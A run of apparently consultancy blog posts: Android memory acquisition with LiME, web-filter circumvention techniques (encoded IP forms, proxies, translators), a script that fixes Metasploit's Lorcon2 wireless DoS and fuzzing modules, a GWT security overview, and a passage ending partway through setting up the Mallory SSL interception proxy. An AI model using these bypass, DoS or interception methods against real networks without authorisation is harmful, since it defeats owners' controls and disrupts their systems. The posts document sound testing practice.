
Acquiring volatile memory from Android based devices with LiME Forensics, Part I

By Ismael Valenzuela.

Up until now, most of the Android forensics research has been focused on areas like the acquisition and analysis of the internal flash NAND memory, SD Cards, understanding the YAFFS2 file system and scrutinizing APK files for malware analysis, among others.

However, little has been written about memory acquisition and analysis of Android devices, one of the most active areas of research in the field of computer forensics. Volatile memory, also referred to as RAM, is a critical piece of evidence for every forensic investigator, since it contains a wealth of information that is gone as soon as the device is rebooted or turned off (at the end of the day, that's why it's called volatile, huh).

Several methods allow the extraction of information about running processes in Android. For example, the analyst could use the Android Debug Bridge (adb) to access a shell on the device and run the following commands to dump information about running processes, network connections and other device logs:

Warning: The following examples assume you have installed the Android SDK and other prerequisites as described later in this post. I also assume that you are familiar with the basic operation of these tools and that you know at least how to create and manage an Android Virtual Device and access it using adb.



$ adb shell ps  
$ adb shell netstat
$ adb shell logcat


Figure 1 – Listing running processes on the Android emulator via adb


An alternative method for dumping the contents of memory of a running process involves using the Dalvik Debugging Monitor Server (ddms), a tool that comes with the Android SDK. All you need to do is to select a process and click on the “DUMP HPROF file” button to dump the contents of that process onto disk.


Figure 2 – Dumping the contents of the com.android.email process via ddms
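The HPROF file produced by ddms uses Android's own dump format. If you want to open it in standard Java heap analysis tools, the SDK ships a converter called hprof-conv under the SDK tools directory. A minimal example, assuming the dump was saved as com.android.email.hprof (the filenames here are just placeholders):

 $ ~/android-sdk-linux/tools/hprof-conv com.android.email.hprof com.android.email-converted.hprof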

However, none of the methods described above can dump the ‘full contents’ of memory. While they allow you to perform some “live analysis”, it wasn’t possible to obtain a full capture of the device’s RAM in the same fashion that it was possible in Linux with tools like fmem. At least, not until DMD came up.

So it was certainly a pleasant surprise to read about DMD (now called LiME Forensics) when preparing for my talk at the 1st International Symposium for Android Security held in Malaga last week. If you read Spanish you can find the slides for my talk, "Latest Advances in Android Forensics", here.

This tool was first presented by its author, Joe Sylve, earlier this year at Shmoocon 2012 in Washington DC, and it's the first tool that allows the analyst to capture the full contents of RAM from Android devices.

While the tool was announced this week, it had effectively been available on Google Code for almost a month, which allowed me to play with it and demo it for my audience last week. As I mentioned during my talk, the installation of the tool can get 'tricky', so I thought I'd better share with you the steps I took to compile it and how to use it.

The first and foremost thing to know before diving into the instructions is that LiME Forensics is a Loadable Kernel Module (LKM), and as such it has to be compiled for the specific kernel of your Android device.

Therefore, in the rest of the post, I will show how you can build a kernel of your own, how to load it onto the emulator and how to cross-compile the LiME LKM so you can test it with your customized kernel.

Though you can find the author’s original installation document here, I found that the instructions didn’t work with the latest versions of the SDK and NDK. Hence, the reason for this post. I hope the following instructions will save you some headaches, severe pain and some valuable time. And if they don’t work for you for some reason, leave a comment, so we can all learn ;)

I also exchanged a couple of emails with Joe Sylve trying to figure out what was wrong, and I have to say he was very responsive (thanks!).

GETTING READY TO ROCK


The following instructions have been tested successfully on Ubuntu 11.10, with Java SE Development Kit 6 Update 31, the Android SDK r18, NDK r7c and with the emulator running an Android Virtual Device (avd) based on Android 4.0.3 (API 15).

We will start by downloading and unzipping the toolchain required to build the Android kernel: the Android SDK and the Android NDK mentioned above.
You can place them anywhere, but take note of the location, since you will need to include those directories in your path, as shown later in this post.

To follow the example, I placed mine in the following directories, hanging off my home folder:

~/android-sdk-linux
~/android-ndk-r7c

Next we will get the Android source code and the tools needed to compile it.

There is no need to duplicate what is well documented in the Android Source website, so just follow the instructions of how to setup a Linux build environment that can be found here: http://source.android.com/source/initializing.html

Once you’ve installed all the required packages, including the Java Development Kit, you should install the repo client, as described here: http://source.android.com/source/downloading.html

You must initialize the repo client now. To do so, create an empty directory to hold your files and run repo init from there:

 $ repo init -u https://android.googlesource.com/platform/manifest

This allows your client to access the android source repository, downloading the latest version of Repo with all its most recent bug fixes.

Now pull down the files to your working directory running:

$ repo sync

You must initialize the environment now:

$ source build/envsetup.sh

And choose a target to build with lunch. I selected the default one:

 $ lunch full-eng

BUILDING THE CUSTOM ANDROID KERNEL


You will need to download and untar the kernel source for your device. If you are dealing with a real device go to the website of your device manufacturer. For our test we will use the “goldfish” source code only. Goldfish is the name of the kernel branch for the Android emulator.

$ git clone https://android.googlesource.com/kernel/goldfish.git ~/source/kernel/goldfish

Now you have the emulator kernel source inside the ~/source/kernel/goldfish/ directory. Change to the goldfish directory and make sure all the tools and the cross-compilation toolchain are in your path. Below is an excerpt of my .bashrc file with the variables I defined for this purpose:

export USE_CCACHE=1

export PATH=$PATH:~/android-sdk-linux/tools/
export PATH=$PATH:~/android-sdk-linux/platform-tools/
export ANDROID_SWT=~/android-sdk-linux/tools/lib/x86_64/
export ANDROID_JAVA_HOME=/usr/lib/jvm/jdk1.6.0_31
export JAVA_HOME=/usr/lib/jvm/jdk1.6.0_31
export CCOMPILER=~/android-ndk-r7c/toolchains/arm-linux-androideabi-4.4.3/prebuilt/linux-x86/bin/arm-linux-androideabi-

Note that the location of these tools (JDK, NDK, etc…) might vary depending on where you placed them in the previous steps.

Before we try compiling the kernel for the emulator we need to get a .config file for the kernel. In order to do that you must retrieve and copy the kernel config from your device. While your device is running and accessible via the Android Debug Bridge, run:

$ cd ~/android-sdk-linux/platform-tools    
$ ./adb pull /proc/config.gz
$ gunzip ./config.gz
$ cp config ~/source/kernel/goldfish/.config

An alternative to this last step would be to run make ARCH=arm goldfish_defconfig from the goldfish kernel source directory.


The next two steps are critical for the success of this exercise, as we will be preparing the kernel source for our module.

First, make sure that the following options are enabled in the kernel config. Check that the .config file contains:

CONFIG_MODULES=y
CONFIG_MODULE_UNLOAD=y
CONFIG_MODULE_FORCE_UNLOAD=y

Otherwise add those lines. These options have to be enabled for the kernel to be able to load and unload modules.
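A quick sanity check, assuming you copied the config into the goldfish source directory as shown above, is to grep for those options:

 $ cd ~/source/kernel/goldfish
 $ grep -E "CONFIG_MODULES=|CONFIG_MODULE_UNLOAD=|CONFIG_MODULE_FORCE_UNLOAD=" .config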

Second, build the kernel using the following command:

$ make ARCH=arm CROSS_COMPILE=$CCOMPILER EXTRA_CFLAGS=-fno-pic modules_prepare

Note that we are using the cross-compilation toolchain provided by the Android NDK with the option CROSS_COMPILE. Obviously, the CCOMPILER variable must be correctly set (see the excerpt of my .bashrc file above). Note that I also had to add the EXTRA_CFLAGS=-fno-pic for make to work with the latest NDK. This is not included in the LiME documentation, but it worked for me.

Your new kernel is now located at arch/arm/boot/zImage

You can now run your brand new kernel using the emulator included with the Android SDK:

$ emulator -avd Demo -kernel ~/source/kernel/goldfish/arch/arm/boot/zImage -show-kernel -verbose

In this case, Demo is my Android Virtual Device (AVD) which I previously created using the AVD manager. It’s running API 15 (Android 4.0.3).
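To confirm that the emulator is actually running your freshly built kernel rather than the stock one, you can check the kernel version string over adb; the build user, host and timestamp should match your build machine:

 $ adb shell cat /proc/version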

OBTAINING AND COMPILING LIME


Grab a copy of LiME from here:
http://code.google.com/p/lime-forensics

All you need is lime.c and a Makefile that will prepare the module for cross-compilation.

A sample Makefile is shipped with the LiME source, but I will copy below the one that I created for this purpose:

obj-m := lime.o

KDIR_GOLD := ~/source/kernel/goldfish/

KVER := $(shell uname -r)

PWD := $(shell pwd)
CCPATH := ~/android-ndk-r7c/toolchains/arm-linux-androideabi-4.4.3/prebuilt/linux-x86/bin

default:
	# cross-compile for Android emulator
	$(MAKE) ARCH=arm CROSS_COMPILE=$(CCPATH)/arm-linux-androideabi- EXTRA_CFLAGS=-fno-pic -C $(KDIR_GOLD) M=$(PWD) modules
	mv lime.ko lime-goldfish.ko

	# compile for local system
	$(MAKE) -C /lib/modules/$(KVER)/build M=$(PWD) modules
	mv lime.ko lime-$(KVER).ko

	make tidy

tidy:
	rm -f *.o *.mod.c Module.symvers Module.markers modules.order \.*.o.cmd \.*.ko.cmd \.*.o.d
	rm -rf \.tmp_versions

clean:
	make tidy
	rm -f *.ko

Save and place this Makefile in the directory where you've placed the source for LiME. Again, make sure the locations of the directories included above correspond with your install, and remember that the recipe lines under each target must be indented with a tab.

Finally (at last!) you are ready to cross-compile the kernel module.

From the directory where you’ve placed lime.c and the Makefile, run:

$ make

If everything went well, you should have an LKM file called lime-goldfish.ko, and you deserve a short break with a good cup of coffee before moving on.
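Before that break, one last sanity check on the module never hurts: the output of file should report a 32-bit ARM ELF relocatable object rather than something built for your host architecture.

 $ file lime-goldfish.ko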

In the second part of this post we will look at how to use this Loadable Kernel Module to dump the full contents of RAM of an Android device and what kind of information can be retrieved from this capture.

About the Author


Ismael Valenzuela (GCFA, GREM, GCIA, GCIH, GPEN, GWAPT, GCWN, GCUX, CISSP, CISM, 27001 Lead Auditor & ITIL Certified) works as a Principal Architect at McAfee Foundstone Services EMEA. Find him on twitter at @aboutsecurity or at http://blog.ismaelvalenzuela.com

Circumventing Internet Censorship

By Kunjan Shah.

During my first engagement at Foundstone I tested a web filtering product, and we found several ways of bypassing it. With the recent news around SOPA and the controversy around the Indian government wanting to pre-screen the Internet, I thought this might be the right time to write a blog on it. In this blog I have mentioned a few such techniques that can be used to circumvent web filtering software. Although a lot of this information is available on the internet (scattered), I have tried to put together a one-stop list of tried and tested techniques with detailed examples.

The discussion in this blog is limited to tricks and techniques that can be used on the web; it does not focus on software that can be used for circumvention, such as application tunneling software, re-routing systems, peer-to-peer software, etc. The reason is that, most of the time, users trying to circumvent corporate web filtering do not have administrator privileges to install these tools. If you already have administrator access to your machine then there are easier ways to bypass filtering than the techniques described below. Some of the widely used tools include Peacefire, TOR, JAP ANON etc. You can find a thorough list of such tools here:

You can also obtain information on what Internet censorship is and its history here. I will not be covering that in this blog. Circumvention may be considered illegal in some companies/countries, and if caught you may get fired or jailed; thus, this blog is for informational purposes only and not an invitation to attempt this.

URL Canonicalization


In this technique we will use alternate domain names and alternative representations of the domain names to bypass filtering. For the purpose of this discussion let's assume that access to www.facebook.com is blocked and our end goal is to access it from behind the web filtering tool. Depending on how intelligent the filtering tool is, one or more of the below-mentioned techniques should work. During our assessment we found that some of these techniques worked on the top filtering brands.

Alternative Domains


Instead of http://www.facebook.com you can try the following.
  1. https://www.facebook.com/ (Sometimes HTTPs version of the site is not blocked)
  2. http://Facebook.com
  3. http://Facebook.com/
  4. http://Facebook.com.
  5. http://Login.facebook.com
  6. http://touch.facebook.com
  7. http://M.facebook.com (Access the mobile version of Facebook instead)
  8. http://Apps.facebook.com
  9. http://Register.facebook.com


Alternate Representations


Not all browsers accept the formats mentioned below equally. However, most of these work with the standard browsers. During our assessment we found that the URL and IP address of the website were blocked. However, when accessing the blocked website using the decimal and octal forms it worked fine for us.
  1. Try accessing Facebook using the IP address: http://66.220.147.44
  2. Decimal format of the IP address 66.220.147.44 : http://1121751852
  3. Hexadecimal format of the IP address: http://0x42dc932c/
  4. Dotted Hexadecimal form: http://0x42.0xdc.0x93.0x2c
  5. Dotted Octal form: http://0102.0334.0223.0054

Below is the list of tools for converting the IP address into different forms:
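If you would rather not rely on an online tool, the conversions are easy enough to do from a shell. A minimal bash sketch, using 66.220.147.44 as the example address:

 # decimal form: (66 * 2^24) + (220 * 2^16) + (147 * 2^8) + 44
 $ echo $(( (66<<24) | (220<<16) | (147<<8) | 44 ))
 1121751852

 # dotted hexadecimal and dotted octal forms of each octet
 $ printf 'hex:   0x%02x.0x%02x.0x%02x.0x%02x\n' 66 220 147 44
 $ printf 'octal: 0%03o.0%03o.0%03o.0%03o\n' 66 220 147 44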

Translation Services


Translation services such as www.microsofttranslator.com can also be used to circumvent filters. We can do this by translating the blocked website, e.g. boingboing.net, from English to English. When doing so, translation services work similarly to web proxy sites. During our assessment we found that filtering tools block some common translation sites such as Babelfish. However, we were able to find one that was not blocked (InterTran) and used it to access the blocked website boingboing.net.


Some translation services such as translate.google.com prevent translation into the same language, so they may not be very useful depending on your needs. However, there is also a solution to this problem. You can use Google Translate to convert a website from English to French and then back to English using Google Chrome's translation features. Babelfish lets you translate from English to English by selecting "French to English" or any such option that ends in "to English". Since there is nothing to translate, it just returns the content in English.


List of other free translation services:


Cached Pages and Mirror Sites


Search engines keep copies of the indexed pages known as Cached pages. Cached pages of the blocked sites can be accessed through special keywords in the search request. During our review we noticed that www.boingboing.net was blocked by the filtering tool. However we could access its cached version through Google cache by searching for “cache:www.boingboing.net”.


We also noticed that we were able to access it by appending "nyud.net:8090" at the end, such as www.boingboing.net.nyud.net:8090. URLs with nyud.net as the domain name are processed by the Coral Content Distribution Network (CCDN). "CCDN is a free peer-peer content distribution network, comprised of a world-wide network of web proxies and name servers." (http://www.coralcdn.org/)


Moreover, old archived pages of the blocked sites can be obtained from www.archive.org or www.bibalex.org.



Low-Bandwidth Simulators


Low-bandwidth simulators such as www.loband.org let us simulate website performance on low bandwidths. This can act as a wrapper allowing us access to the text only version of the blocked sites. This is a good option to access news, blogs, email and other sites, however not a good option for accessing sites with Flash and HTML5 such as YouTube.



Proxy Websites


Proxy websites are the easiest and best-known way of accessing banned websites. However, the issue is that web filtering systems block most known proxy websites and continue to update their lists on a regular basis. The good news is that proxy sites keep appearing at a faster rate than they are banned, so you will always find some that are not blocked. You can obtain a list of regularly updated proxy servers here. You can also join a proxy mailing list like Circumventor. If you are using proxy servers to access banned sites such as Facebook, be cautious about the information you provide, such as credentials. A lot of this information may be cached on the proxy servers and get leaked or misused by the admins.



Web to email


It is possible to obtain blocked web pages and search the web for information via email by sending simple commands. Here is a list of some popular sites:

A complete list of all such sites and commands can be found here. To obtain a blocked web page via email, send an email to www@web2mail.com with the address of the website as the subject.




In addition to this, you can also subscribe to receive daily updates of a website in email. This is a good method for obtaining information from blocked news and blog sites. There are other websites that provide similar services such as www.changedetection.com and www.watchthatpage.com. Every time a web page changes an email alert is sent to the user.



Web to PDF


Similarly you can also convert web pages to PDFs and download them or email them without getting blocked. None of the web filtering software that we tested caught this.


Websites providing free web to PDF conversion services:


RSS Aggregators


RSS Aggregators are websites or desktop applications that let you subscribe to and read RSS (Really Simple Syndication) Feeds. During our review we found that the filtering software did not block access to RSS aggregators such as Google Reader, Bloglines and Fastladder etc. This makes it possible for the user to read blogs from the restricted web sites like BoingBoing by pointing such RSS readers to listen to the RSS feeds. However, this technique is limited to sites that publish RSS feeds.



Google Add-ons


During our assessment we noticed that it was possible to access some of the blocked sites via Google gadgets. Just add gadgets for the blocked sites such as Facebook, Twitter and YouTube etc. to iGoogle and access the blocked content. Some smart web filtering systems may prevent one or more such gadgets, but not all of them. Similarly you can also use Yahoo widgets.



Non-Standard Web Browsers


Another technique is to use non-standard browsers for accessing blocked sites. Some examples include:

Accessing Blocked Instant Messengers


There are several free websites that let you access blocked instant messengers online over the web. Here is a list of few such sites:


Enjoy!

Installing Lorcon2 on Backtrack 5 R2

By Robert Portvliet.

Recently I wanted to play around with some of the wireless DoS and fuzzing tools in Metasploit, which require the installation of Lorcon2. I found this to be a bit of an adventure, so I figured I would write up a quick blog post for those who may encounter the same issues in the future.

So, the Metasploit documentation states to install Lorcon2 as follows:
 $ sudo bash  
# cd /opt/metasploit3/msf3/external/ruby-lorcon2/
# svn co http://802.11ninja.net/svn/lorcon/trunk lorcon2
# cd lorcon2
# ./configure --prefix=/usr && make && make install
# cd ..
# ruby extconf.rb
# make && make install

This sort of worked - when I ran ./configure, I noticed a bunch of strange warnings about if_arp.h and wireless.h:


A quick dive into the autoconf documentation (http://www.gnu.org/software/autoconf/manual/autoconf.html#Present-But-Cannot-Be-Compiled) yields:

20.7 Header Present But Cannot Be Compiled

The most important guideline to bear in mind when checking for features is to mimic as much as possible the intended use. Unfortunately, old versions of AC_CHECK_HEADER and AC_CHECK_HEADERS failed to follow this idea, and called the preprocessor, instead of the compiler, to check for headers. As a result, incompatibilities between headers went unnoticed during configuration, and maintainers finally had to deal with this issue elsewhere.

The transition began with Autoconf 2.56. As of Autoconf 2.64 both checks are performed, and configure complains loudly if the compiler and the preprocessor do not agree. However, only the compiler result is considered.

Ok, so those warnings weren't really that bad.

libnl-dev

There is still the missing libnl library warning. Installing the libnl-dev package fixed those:

 apt-get install libnl-dev 

Troubleshooting test.rb

With the Ruby extension all set up and installed, it's time to run the test.rb script provided in /opt/metasploit3/msf3/external/ruby-lorcon2/. You'll notice if you try to run it, you're going to get this error:

To make a long story short, after a fair bit of searching I found a very helpful post at http://www.secgeeks.com/fix_for_lorcon2_ruby_1_9_2.html which stated the following:
Faced a minor problem with the Lorcon2 wrapper module, in compiling with ruby 1.9.2. The following will fix the issues for those who are facing it:
Change the STR2CSTR calls in the file ruby-lorcon-1.0.0/Lorcon.c at lines 441 and 443:

 driver = STR2CSTR(rbdriver);

intf = STR2CSTR(rbintf);

to:

 driver = StringValuePtr(rbdriver);

intf = StringValuePtr(rbintf);

Hope it helps.
Yes it did Secgeek, thanks very much! However, in the case of Lorcon2, you have to edit three lines instead of two:


Change all three "STR2CSTR" calls on these three lines to "StringValuePtr". When you are done it should look like this:

After that, running ‘ruby test.rb’ gives us the desired output.
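As an aside, if you would rather not edit the file by hand, the same substitution (the one the install script at the end of this post also performs) can be applied with a one-line sed from the ruby-lorcon2 directory:

 $ sed -i 's/STR2CSTR/StringValuePtr/g' Lorcon2.c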



Couple More Ruby Issues

Ok, so let’s test one of the Metasploit modules that use Lorcon2 to see if it works.


No dice…
A bit more searching led me to a closed bug report at http://redmine.backtrack-linux.org:8080/issues/153 which stated the following:

Solution: they should be compiled with ruby 1.9.1 and placed in /opt/framework3/ruby/lib/ruby/site_ruby/1.9.1/i686-linux
  1. install ruby1.9.1
  2. cd to /opt/framework3/msf/external/ruby-lorcon2
  3. ruby1.9.1 extconf.rb
  4. make
  5. copy Lorcon2.so to the directory specified above.
  6. do the same for /opt/framework3/msf/external/pcaprub
  7. copy liborcon* files from /usr/local/lib to /opt/framework3/lib replacing existing files

Following these instructions, I copied the liborcon* files, which were in /usr/lib in my case, to /opt/metasploit/msf3/lib/, and copied Lorcon2.so from /opt/metasploit/msf3/external/ruby-lorcon2 to /opt/metasploit/ruby/lib/ruby/site_ruby/1.9.1/i686-linux/.

It's working! (not completely)

Fired up Metasploit again….. Nice!


Kismet confirms it's working.


Then I tried ssidlist_beacon.rb:


Not so nice…. WTF?
When I cracked it open I saw that while all the other wireless modules use Lorcon2, it references Lorcon in the ‘includes’ section. So, I tried changing it to Lorcon2. I fired up Metasploit again:


Better… a different error; now it complains about an undefined method ‘channel’. After taking a look at the other wireless modules, I found two others, netgear_ma521_rates.rb and netgear_wg311pci.rb, that did not work either and gave the same error. They all used the same syntax to determine the channel:

 "\x03" + "\x01" +
channel.chr

The FakeAP.rb module, which works, uses the following instead:

 "\x03" + "\x01" +
datastore['CHANNEL'].to_i.chr

Using that to replace the previous line fixed the problem.

It works! (for real now)



All kinds of SSIDs in the air now :)


The channel issue seemed to affect the following modules; I received the same error from all of them, and when I replaced that line as described above, they all appeared to work properly.


auxiliary/dos/wifi/netgear_ma521_rates - NetGear MA521 Wireless Driver Long Rates Overflow
auxiliary/dos/wifi/netgear_wg311pci - NetGear WG311v1 Wireless Driver Long SSID Overflow
auxiliary/dos/wifi/ssidlist_beacon - Wireless Beacon SSID Emulator
auxiliary/fuzzers/wifi/fuzz_beacon - Wireless Beacon Frame Fuzzer
auxiliary/fuzzers/wifi/fuzz_proberesp - Wireless Probe Response Frame Fuzzer

When running the auxiliary/fuzzers/wifi/fuzz_beacon module, beacons appear to be fuzzing properly :)


As does auxiliary/fuzzers/wifi/fuzz_proberesp:


I wrote a quick bash script to correct these issues and install Lorcon2. I ran it through a few times and all seemed well, but let me know if you experience any issues.

 #!/bin/bash

# Script to install Lorcon2 on Backtrack 5 R2
# By Robert Portvliet
# Foundstone

# Set up variables
msfwifi_dir="/opt/metasploit/msf3/modules/auxiliary/dos/wifi/"
rubylorcon_dir="/opt/metasploit/msf3/external/ruby-lorcon2/"
msfuzz_dir="/opt/metasploit/msf3/modules/auxiliary/fuzzers/wifi/"

echo "[*] This script will install Lorcon2 on Backtrack 5 R2"

echo "[*] Install libnl netlink library"
apt-get install libnl-dev

echo "[*] Downloading Lorcon2 from SVN"
svn co http://802.11ninja.net/svn/lorcon/trunk lorcon2

echo "[*] Copying Lorcon2 to MSF"
cp -r ./lorcon2 $rubylorcon_dir

echo "[*] Fixing MSF wireless modules"
sed -i 's/+ channel.chr/+ datastore['\''CHANNEL'\''].to_i.chr/g' $msfwifi_dir/ssidlist_beacon.rb
sed -i 's/+ channel.chr/+ datastore['\''CHANNEL'\''].to_i.chr/g' $msfwifi_dir/netgear_*
sed -i 's/+ channel.chr/+ datastore['\''CHANNEL'\''].to_i.chr/g' $msfuzz_dir/*.rb
sed -i 's/Lorcon/Lorcon2/g' $msfwifi_dir/ssidlist_beacon.rb

echo "[*] Fixing Ruby-Lorcon2 before building"
sed -i 's/STR2CSTR/StringValuePtr/g' $rubylorcon_dir/Lorcon2.c

echo "[*] Building Lorcon2"
cd $rubylorcon_dir/lorcon2
./configure --prefix=/usr && make && make install

cd ..

echo "[*] Building Ruby-Lorcon2"
ruby ./extconf.rb && make && make install

echo "[*] Copying Lorcon2 libraries into Metasploit"
cp $rubylorcon_dir/Lorcon2.so /opt/metasploit/ruby/lib/ruby/site_ruby/1.9.1/i686-linux/
cp /usr/lib/liborcon2* /opt/metasploit/msf3/lib/

echo "[*] Finished, fire up a wireless module and see if it works"



A Quick Overview of Google Web Toolkit Application Security

By Vijay Agarwal.

On one of my recent engagements I got the opportunity to work on an application that uses Google Web Toolkit (GWT). GWT is an open source Java framework used to create rich internet applications. Both the server and the front end are written in Java, and all of the front end logic is compiled into obfuscated JavaScript equivalents that are loaded into the browser.

Boot Strap Loading and cache/no cache Files


GWT requires no special browser plug-ins and has minimal cross-browser headaches. Typically, whenever an application loads, its bootstrap process is kicked off and starts the application initiation process. On the server side, the gwt.js and .nocache.js files handle the bootstrap process and are responsible for performing the deferred binding, which loads the configuration, modules, and browser-specific classes. During this time, initial configuration steps like browser detection take place, and JavaScript files compatible with the browser in use are generated.

The above process results in multiple "[MD5 Sum].cache.html" files. These are browser-specific files that contain application logic, and are generated post authentication. They are named according to the MD5 sum of their contents and consist of RPC methods, other restricted methods, and sensitive information.

Example cache file names:
  • https://www.xyz.com/testapp/9E871855826913D91F95F8F65F4ED9E3.cache.html
  • https://www.xyz.com/testapp/C2C2D9E9AB0BBFD8B66FD43702FAF3B5.cache.html

Example file content:
 function jy(b,c,d,e,f){[..snip..]
!!$stats&&$stats({moduleName:$moduleName,sessionId:$sessionId,subSystem:TG,evtGroup:j,method:oI,millis:(new Date).getTime(),type:WH});
k=vr(b);try{lr(k.b,oF+Oq(k,pI)); lr(k.b,oF+Oq(k,qI)); lr(k.b,ZH);lr(k.b,oF+Oq(k,$H));lr(k.b,oF+Oq(k,$H));
lr(k.b,oF+Oq(k,rI));lr(k.b,oF+Oq(k,c));lr(k.b,oF+Oq(k,d));lr(k.b,oF+e);i=jr(k);[..snip..]wr(b,(cs(),oI),j,i,f)

Since these cache files remain accessible even after the user logs out of the application, they should be restricted on the server side and should not be accessible without authentication. If accessible, these files may disclose sensitive information.
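One quick way to test for this during an assessment is to request a cache file from an unauthenticated session and check the response code; a 200 without any valid session cookie confirms the issue. A sketch using curl and the example URL above (the filename itself is assumed to be known from an authenticated session):

 $ curl -s -o /dev/null -w "%{http_code}\n" https://www.xyz.com/testapp/9E871855826913D91F95F8F65F4ED9E3.cache.html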

Client Side Code


Google obfuscates its code before it reaches the client's browser as an extra layer of security and, presumably, to save space. The client side code can potentially contain application data and all of the components associated with its inner workings, things like its RPC framework, which can greatly aid an attacker. Google uses all of the common obfuscation methods, such as function and variable renaming, reordering, and respacing.

Authorization and other Issues


Authorization issues seem to come up quite a bit with GWT-based applications, since it's often adopted by developers who focus more on interface design than on security. Because of this, all of the major web application vulnerabilities should not be forgotten, particularly those associated with authorization, such as forced browsing, session replay, and parameter manipulation.

References

Mallory MITM + FIX SSL Decryption

By Paul Ambrosini.

Recently, I was faced with testing a Java-based thick client that communicates using the "Financial Information eXchange" protocol, also known as "FIX" (the protocol is documented here: http://fixprotocol.org/). FIX is "a messaging standard developed specifically for the real-time electronic exchange of securities transactions". Most thick clients these days use web-based services and in doing so use some variant of HTTP (or, if not that, plaintext XML interchange), but FIX is different.

In this post I’ll cover how I approached testing this protocol and the tools I used to test it. I won’t be discussing the FIX protocol in much detail beyond what can be found on the FIX site or various FIX wikis on the net. This post will focus primarily on how to set up and configure Mallory to decrypt the SSL stream from a FIX-speaking thick client.

To start my testing I was given a thick client (the app itself is out of scope; it's a developer testing harness). The client was written in Java and had lots of configuration options that later proved useful for testing. This thick client quickly introduced certain limitations to testing, however:
  1. The client itself is out-of-scope, so only findings that apply to the API can be reported;
  2. The thick client is using the FIX protocol over TCP; and
  3. The TCP Stream is SSL encrypted.


I quickly realized that a normal proxy (Fiddler or Burp, for example) was going to be of very limited help. The first suggestion I got was Charles Proxy, which can handle generic TCP/SSL connections. After doing some reading on the FIX API, though, I decided to go with Mallory, since I can write python code to tie in with Mallory and assist my testing.

Information on Mallory can be found here: https://bitbucket.org/IntrepidusGroup/mallory/wiki/Home

The install guide can be found here: https://bitbucket.org/IntrepidusGroup/mallory/wiki/Installation

Note: I originally used the Mallory VM from the torrent; however, at the time of writing, no one was seeding the torrent. For that reason, I based this guide off of a fresh Ubuntu install.

Mallory Initial Setup



I installed Ubuntu 11.04 (Natty Narwhal) Desktop onto a VM with:
  • 3 Network Interface Cards with each set to Bridged
  • 1024 MB of RAM
  • 10 GB of hard disk space
  • A user named “mallory”


Note: These specifications reflect the way I was going to set up my network; make sure to decide how you will route traffic in your case.

The first step is getting Mallory installed. We'll need a shell (for example, xterm, konsole, or gnome-terminal) and internet access to the VM. The network setup for this VM will use one interface as a gateway interface (eth0), one interface as an outgoing interface (eth1) and one interface as a DNS listener (eth2). Upon first boot all three NICs have DHCP enabled, and two of them (eth0 and eth2) need to be brought down for internet connectivity to work.

Commands:

 $ sudo ifconfig eth0 down  
$ sudo ifconfig eth2 down
$ ping 8.8.8.8 #test the connection



Figure 1: Turning off two interfaces and testing the connection with ping.


Now that the internet connection works we download the Mallory install script and run it.

 $ wget https://bitbucket.org/IntrepidusGroup/mallory/downloads/mallory_install.sh
$ chmod +x mallory_install.sh
$ sudo ./mallory_install.sh
**a lot of text later (go grab some tea/coffee)**
/home/mallory/mallory #folder to place mallory in
*hit enter for yes*
$ cd /home/mallory/mallory/current/src/



Figure 2: Downloading and running the Mallory install script.



Figure 3: Finishing the install script and changing into the new directory.


Once installation is complete and we’re in the Mallory directory, we need to get our network set up correctly.

Routing Traffic

How you use Mallory will be determined by how you route traffic. Mallory can handle all sorts of situations, but for my purposes, setup is fairly simple. I’m going to use my Mallory VM as a network gateway and route traffic from my testing VM through Mallory. Because I am completely controlling my test environment, I don’t need to do any extra ARP poisoning or PPTP setup. This setup has the additional benefit that, once the VM is properly configured, it can easily be “turned on” or “turned off” just by changing a host’s routing tables.

My network setup will use eth0 as the MITM interface and eth2 as the DNS listener interface, so each of these interfaces will need to be up and configured with static IP addresses. eth1 will be the Mallory VM’s connection to the Internet and get a DHCP address. Because we are using Ubuntu we can edit the file /etc/network/interfaces which will persist the settings across reboots.

# First allow manual interface configuration
$ sudo service network-manager stop
$ sudo killall -w dhclient



Figure 4: Stopping the network manager service and any dhclient processes.


Now open /etc/network/interfaces with your favorite editor. Static IPs on eth0 (MITM) and eth2 (DNS listener) then DHCP on eth1:

$ sudo vi /etc/network/interfaces



Figure 5: Configuration settings for /etc/network/interfaces.
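A minimal sketch of that configuration, assuming the 10.0.0.x addressing used for the test client later in this post (eth0 as the 10.0.0.1 gateway interface, eth2 as the 10.0.0.3 DNS listener, and eth1 left on DHCP); adjust the addresses to match your own layout:

 auto eth0
 iface eth0 inet static
     address 10.0.0.1
     netmask 255.255.255.0

 auto eth1
 iface eth1 inet dhcp

 auto eth2
 iface eth2 inet static
     address 10.0.0.3
     netmask 255.255.255.0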


$ sudo ifup eth0
$ sudo ifup eth2
$ ifconfig # Check the configuration



Figure 6: Turning on the interfaces with "ifup" and checking their settings with "ifconfig".

Install and start dnsmasq on eth2 to act as a DNS request forwarder:

$ sudo apt-get install dnsmasq
$ sudo /etc/init.d/dnsmasq stop
$ sudo /etc/init.d/dnsmasq start -i eth2



Figure 7: Install dnsmasq with apt-get then stop and start the daemon on eth2.


Note: Because we are using Ubuntu, we need to stop the Network Manager service and kill all the dhclient processes. Otherwise, our static addresses will get mysteriously wiped out every few minutes. On a system used for other purposes, this might have adverse consequences.

To make sure everything is working fine, ping 8.8.8.8 and check for connectivity. If you can’t ping out for some reason just do:

$ sudo ifdown eth1
$ sudo killall -w dhclient
$ sudo ifup eth1


…then try to ping again.

Now, because we are controlling the environment, we need to configure our testing VM to route through the gateway. On Windows, configure the IP addressing like so:


Figure 8: Windows network configuration for testing VM


On a Linux system, the following commands produce the same configuration state (commands to kill dhclient and/or network-manager not included):

 $ sudo ifconfig eth0 inet 10.0.0.2 netmask 255.255.255.0
$ sudo route add default gw 10.0.0.1
$ echo "nameserver 10.0.0.3" | sudo tee /etc/resolv.conf


Intercepting Traffic


The next step is to actually start Mallory and confirm that we can capture encrypted traffic. Open two command prompts on the Mallory VM, change to the Mallory directory in each of them, and start Mallory; one in the GUI mode, one in worker mode.

Terminal 1, Worker Mode:


$ cd /home/mallory/mallory/current/src
$ sudo python mallory.py



Figure 9: Starting mallory.py for the first time.


Terminal 2, GUI Mode:


$ cd /home/mallory/mallory/current/src
$ sudo python launchgui.py



Figure 10: Executing the launchgui.py script and the GUI started.


After launching the GUI from the command line, the GUI itself should be displayed. Using this interface, configure the interfaces used by Mallory by clicking the checkbox for “Perform MiTM” on the eth0 interface and “Outbound Interface” for the eth1 interface, then click Apply Configuration at the bottom. Terminal 2 – where we launched the GUI – will show some iptables rules get applied.


Figure 11: Start the MiTM and outbound interfaces settings.


